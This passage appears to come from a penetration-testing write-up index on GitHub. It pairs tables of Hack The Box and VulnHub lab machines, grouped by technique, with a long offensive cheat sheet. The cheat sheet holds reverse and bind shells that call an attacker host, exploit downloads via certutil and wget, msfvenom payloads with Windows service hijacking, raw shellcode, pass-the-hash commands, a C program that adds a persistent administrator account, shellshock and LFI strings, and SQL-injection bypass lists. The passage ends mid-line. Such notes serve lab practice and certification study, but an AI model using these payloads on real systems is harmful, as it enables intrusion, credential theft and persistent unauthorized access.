[`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="privesc_shell_escape"></a> #### privesc_shell_escape [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_ssh_authorizedkeys"></a> #### privesc_ssh_authorizedkeys [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | --- <a name="privesc_ssh_knownhosts"></a> #### privesc_ssh_knownhosts [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Moria: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.pdf) | [vh#187](https://www.vulnhub.com/entry/moria-11,187/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/killchain.png" width="100" height="100" /> | [`privesc_ssh_knownhosts`](https://github.com/7h3rAm/writeups#privesc_ssh_knownhosts) | --- <a name="privesc_strace_setuid"></a> #### privesc_strace_setuid [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | --- <a name="privesc_sudo"></a> #### privesc_sudo [⇡](#privesc) using `sudo` to execute programs that run with elevated privileges | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 3. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 4. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 5. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 6. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="privesc_sudoers"></a> #### privesc_sudoers [⇡](#privesc) being able to edit the `/etc/sudoers` file to give a user elevated privileges | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 2. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf) | [htb#108](https://app.hackthebox.eu/machines/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100" /> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 3. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf) | [htb#64](https://app.hackthebox.eu/machines/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100" /> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 4. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | | 5. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 6. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 7. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="privesc_tmux_rootsession"></a> #### privesc_tmux_rootsession [⇡](#privesc) --- <a name="privesc_windows_ms10_059"></a> #### privesc_windows_ms10_059 [⇡](#privesc) ```shell wget https://github.com/abatchy17/WindowsExploits/raw/master/MS10-059%20-%20Chimichurri/MS10-059.exe sharehttp <targetport> certutil.exe -urlcache -split -f "http://<attackerip>:<targetport>/MS10-059.exe" pe.exe nc -nlvp 444 pe.exe <attackerip> 444 ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 [+] https://github.com/abatchy17/WindowsExploits/tree/master/MS10-059%20-%20Chimichurri --- <a name="privesc_windows_ms11_046"></a> #### privesc_windows_ms11_046 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf) | [htb#3](https://app.hackthebox.eu/machines/3) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png" width="100" height="100" /> | [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root), [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | --- <a name="privesc_windows_ms14_070"></a> #### privesc_windows_ms14_070 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf) | [htb#13](https://app.hackthebox.eu/machines/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) | --- <a name="privesc_windows_ms15_051"></a> #### privesc_windows_ms15_051 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf) | [htb#14](https://app.hackthebox.eu/machines/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100" /> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) | --- <a name="privesc_windows_ms16_032"></a> #### privesc_windows_ms16_032 [⇡](#privesc) --- <a name="privesc_windows_ms16_098"></a> #### privesc_windows_ms16_098 [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf) | [htb#6](https://app.hackthebox.eu/machines/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100" /> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | --- <a name="privesc_windows_upnphost"></a> #### privesc_windows_upnphost [⇡](#privesc) On a Windows XP system, we can modify the insecurely configured `upnphost` service to gain elevated privileges. This can be done by creating a reverse shell binary and getting it executed by restarting the vulnerable service. ```shell msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -a x86 --platform windows -f exe -o pe.exe # upload pe.exe file to the target system sudo nc -nlvp <attackerport> sc config upnphost binpath= "C:\Inetpub\wwwroot\pe.exe" sc qc upnphost sc config upnphost obj= ".\LocalSystem" password= "" sc config SSDPSRV start= auto net start SSDPSRV net start upnphost ``` [+] https://www.hackingdream.net/2020/03/windows-privilege-escalation-cheatsheet-for-oscp.html --- <a name="tips"></a> ## ⚡ Tips [↟](#contents) ### bind shell [🡑](#tips) ``` bs.c #include <sys/socket.h> #include <netinet/in.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char* argv[]) { int host_sock = socket(AF_INET, SOCK_STREAM, 0); struct sockaddr_in host_addr; host_addr.sin_family = AF_INET; host_addr.sin_port = htons(atoi(argv[1])); host_addr.sin_addr.s_addr = INADDR_ANY; bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr)); listen(host_sock, 0); int client_sock = accept(host_sock, NULL, NULL); dup2(client_sock, 0); dup2(client_sock, 1); dup2(client_sock, 2); execve("/bin/bash", NULL, NULL); } gcc -m32 -o bs bs.c ./bs 4444 ``` ### buffer overflow [🡑](#tips) ``` payload = "\x41" * <length> + <ret_address> + "\x90" * 16 + <shellcode> + "\x43" * <remaining_length> pattern create: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <attackerport> pattern offset: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <attackerport> -q <address> nasm: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb nasm > jmp eax bad characters: badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") find address for "jmp esp" using mona.py: !mona jmp -r esp -b <list of bad chars> gcc compilation options: linux: gcc -m32 -Wl,--hash-style=both 9542.c -o 9542 -wl,--hash-style=both: linker option to enable both gnu and sysv style hashtable support references: https://github.com/s0wr0b1ndef/OSCP-note/blob/master/Buffer_overflow/info.txt https://github.com/justinsteven/dostackbufferoverflowgood/blob/master/dostackbufferoverflowgood_tutorial.md ``` ### file transfers [🡑](#tips) ``` certutil.exe -urlcache -split -f "https://download.sysinternals.com/files/PSTools.zip" pstools.zip powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<targetip>/file.exe','C:\Users\user\Desktop\file.exe')" python3 -m pyftpdlib -p 21 rdesktop <targetip> -r disk:remotedisk=/usr/share/windows-binaries gzip+xxd: sender: gzip -c < file > file.gz xxd -p file.gz | tr -d '\n' && echo receiver: echo 1f8b...0000 > /tmp/file.gz.hex xxd -p -r < /tmp/file.gz.hex > /tmp/file.gz gunzip -c < /tmp/file.gz > /tmp/file automate file download via windows ftp client: echo open <targetip> >ftp_commands.txt echo anonymous >>ftp_commands.txt echo whatever >>ftp_commands.txt echo binary >>ftp_commands.txt echo get met8888.exe >>ftp_commands.txt echo bye >>ftp_commands.txt ftp -s:ftp_commands.txt create wget.vbs and download netcat: >C:\Windows\d.vbs echo strUrl = WScript.Arguments.Item(0) >>C:\Windows\d.vbs echo StrFile = WScript.Arguments.Item(1) >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >>C:\Windows\d.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >>C:\Windows\d.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >>C:\Windows\d.vbs echo Err.Clear >>C:\Windows\d.vbs echo Set http = Nothing >>C:\Windows\d.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >>C:\Windows\d.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >>C:\Windows\d.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >>C:\Windows\d.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >>C:\Windows\d.vbs echo http.Open "GET", strURL, False >>C:\Windows\d.vbs echo http.Send >>C:\Windows\d.vbs echo varByteArray = http.ResponseBody >>C:\Windows\d.vbs echo Set http = Nothing >>C:\Windows\d.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >>C:\Windows\d.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >>C:\Windows\d.vbs echo strData = "" >>C:\Windows\d.vbs echo strBuffer = "" >>C:\Windows\d.vbs echo For lngCounter = 0 to UBound(varByteArray) >>C:\Windows\d.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >>C:\Windows\d.vbs echo Next >>C:\Windows\d.vbs echo ts.Close >>C:\Windows\d.vbs dir C:\Windows\d.vbs C:\Windows\d.vbs "http://<targetip>/nc.exe" C:\Windows\nc.exe netcat: nc -w3 <targetip> 1234 <file.sent cmd /c nc.exe -l -v -p 1234 >file.rcvd smb (139/tcp, 445/tcp): server: python smbserver.py -smb2support shared $HOME/toolbox/scripts/shared copy ntlm/lm hashes submitted by windows clients during transfers and crack via jtr/hashcat client: list files: smbclient -L <targetip> --no-pass list files: net view \\<targetip> list files: dir \\<targetip>\shared copy files: copy \\<targetip>\shared\met8888.exe execute files: \\<targetip>\shared\met8888.exe tftp (69/udp): server: atftpd --daemon --port 69 $HOME/toolbox/scripts/shared metasploit: use auxiliary/server/tftp set TFTPROOT $HOME/toolbox/scripts/shared exploit client: download: tftp -i <targetip> GET met8888.exe upload: tftp -i <targetip> PUT hashes.txt install: pkgmgr /iu:"TFTP" ``` ### heartbleed [🡑](#tips) ``` nmap --script=ssl-heartbleed -p <targetport> <targetip> https://github.com/sensepost/heartbleed-poc python $HOME/toolbox/scripts/heartbleed-poc/heartbleed-poc.py -n10 -f dump.bin <targetip> -p <targetport> strings dump.bin ``` ### iptables [🡑](#tips) ``` config file: /etc/iptables/rules.v4 ``` ### lfi/rfi/image upload [🡑](#tips) ``` scan: uniscan -u http://<targetip>/ -qweds wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://<targetip>/FUZZ php b64 leak and command execution: php://filter/convert.base64-encode/resource=<pagename> <?php echo passthru($_GET[cmd]) ?> bypass upload filter: change extension to PHP, PHP3, PHP4, PHP5 add magic bytes to start of file (eg: GIF87 to a php shell) to evade upload filters local file access: http://<targetip>/?page=php://filter/convert.base64-encode/resource=index notice urls that accept a generic filename as parameter: ?page=file1.php ?page=../../../../../../etc/passwd ?page=../../../../../../windows/system32/drivers/etc/hosts ippsec steps (htb.beep: https://youtu.be/XJmBpOd__N8): /etc/passwd /proc/self/status find home username in passwd, locate home directory for user: /var/lib/asterisk/.ssh/id_rsa ``` ### passthehash [🡑](#tips) ``` pth-toolkit: git clone https://github.com/byt3bl33d3r/pth-toolkit pth-winexe -U hash //IP cmd xfreerdp: apt-get install freerdp-x11 xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP meterpreter: meterpreter > run post/windows/gather/hashdump Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf exploit(psexec) > exploit meterpreter > shell misc: fgdump.exe /usr/bin/pth-winexe -U administrator%0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52 //<targetip> cmd.exe wmiexec.exe -hashes 0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52 administrator@localhost ``` ### passwords [🡑](#tips) ``` shadow file structure: $id$salt$password generate shadow file hash: mkpasswd -m md5 password salt mkpasswd -m sha-256 password salt mkpasswd -m sha-512 password salt ``` ### persistence [🡑](#tips) ``` add a new administrator user: net user anderson cooper /add && net localgroup administrators anderson /add add user to rdp group: net localgroup "Remote Desktop Users" anderson /add enable rdp in firewall: reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 netsh firewall set service remoteadmin enable netsh firewall set service remotedesktop enable netsh firewall add portopening TCP <targetport> "RDP" enable rdp via registry (requries reboot): reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f is rdp service running: tasklist /svc | findstr /c:TermService start rdp service: net start TermService permanently enable rdp service: sc config TermService start=auto code: useradd.c: #include <stdlib.h> int main() { int i; i=system("net user anderson cooper /add && net localgroup administrators anderson /add"); return 0; } add user: #include <stdlib.h> /* system, NULL, EXIT_FAILURE */ int main() { int i; i=system("net user anderson cooper /add && net localgroup administrators anderson /add"); return 0; } # compile: i686-w64-mingw32-gcc -o useradd.exe useradd.c ``` ### port forward [🡑](#tips) ``` socat: socat tcp-listen:<targetport>,fork,reuseaddr tcp:127.0.0.1:80 & socat tcp-listen:8065,fork,reuseaddr tcp:127.0.0.1:65334 & plink: plink.exe -v -x -a -T -C -noagent -ssh -pw "<localpassword>" -R <targetport>:127.0.0.1:<targetport> <localuser>@<attackerip> meterpreter: # https://www.offensive-security.com/metasploit-unleashed/portfwd/ # forward remote port to local address meterpreter > portfwd add --l <targetport> --p <targetport> --r <targetip> kali > rdesktop 127.0.0.1:<targetport> ``` ### portknock [🡑](#tips) ``` knock once on port <targetport>/tcp: hping3 <targetip> -S -p <targetport> -c 1 nc -vvvz <targetip> <targetport> knock on multiple tcp ports in a given sequence: hping3 <targetip> -S -p 666 -c 1; hping3 <targetip> -S -p 7000 -c 1; hping3 <targetip> -S -p 8890 -c 1 nmap -Pn -sT -r -p666,7000,8890 <targetip> ``` ### restricted shells [🡑](#tips) ``` rbash: bash -i BASH_CMDS[foobar]=/bin/bash;foobar lshell: echo os.system("/bin/bash") ``` ### reverse shell [🡑](#tips) ``` reverse tcp shell from bash: /bin/bash -i >& /dev/tcp/<targetip>/<attackerport> 0>&1 make a partially interactive terminal usable: target: python -c "import pty; pty.spawn('/bin/bash')" local: stty raw -echo ; fg target: reset ; export SHELL=bash ; export TERM=xterm ; stty size ; stty -rows 45 -columns 90 ; stty size reverse php shell on windows: https://raw.githubusercontent.com/Dhayalanb/windows-php-reverse-shell/master/Reverse%20Shell.php ``` ### shellcode [🡑](#tips) ``` /bin/sh: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 ``` ### shellshock [🡑](#tips) ``` look for /cgi-bin/ directory (incldue 403 code for gobuster scan) check for scripts (-x sh,pl) using gobuster test http header, user-agent probably curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<targetip>/cgi-bin/user.sh gobuster -u <targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 gobuster -u <targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403 -k -x sh,pl,py nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <targetip> ``` ### sql injection [🡑](#tips) ``` manual verification: ' or 1=1 -- - ' || 1=1 # or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 find a row where you can place your output: http://<targetip>/inj.php?id=1 union all select 1,2,3,4,5,6,7,8 get db version: http://<targetip>/inj.php?id=1 union all select 1,2,3,@@version,5 get current user: http://<targetip>/inj.php?id=1 union all select 1,2,3,user(),5 see all tables: http://<targetip>/inj.php?id=1 union all select 1,2,3,table_name,5 from information_schema.tables get column names for a specified 